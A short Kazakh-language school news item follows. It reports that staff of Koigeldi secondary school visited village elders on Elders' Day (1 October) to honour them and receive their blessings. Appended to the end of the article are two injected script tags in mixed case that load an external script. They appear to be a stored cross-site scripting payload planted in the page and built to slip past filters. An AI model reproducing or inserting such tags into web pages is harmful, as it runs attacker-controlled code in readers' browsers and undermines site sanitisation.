«Ауылыңда қартың болса, жазылып қойған хатпен тең» деп барлық ел құрмет көрсеткен. «Төріңнен қарт кетпесін» деп, той-томалақты батасыз бастамаған, қариялардан бата алуға тырысқан. Батады ел озарын білген қазақпыз ғой. Үлкендерге құрмет көрсету жастайынан бойына сіңген текті елдің ұрпағымыз. 1-қазаң «Қарттар күні» мерекесінде барлық ауыл қарттарына құрмет көрсетіп, ақылын тыңдап, батасын алуға Қойгелді орта мектебі ұжымы атынан мектеп директоры міндетін атқарушы Хавдеш Фариза, тәрбие ісі жөніндегі меңгерушісі Ерменхан Күмісжан , тәлімгер Әділ Дулатұлы барып қайтты. Қазыналы қарттарымыз ақ тілектері мен алғыстарын аямайды. Өткеннен үлгі алып, келешекке қарыштап қадам басайық, еліміздің тұғыры биік болсын!!!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>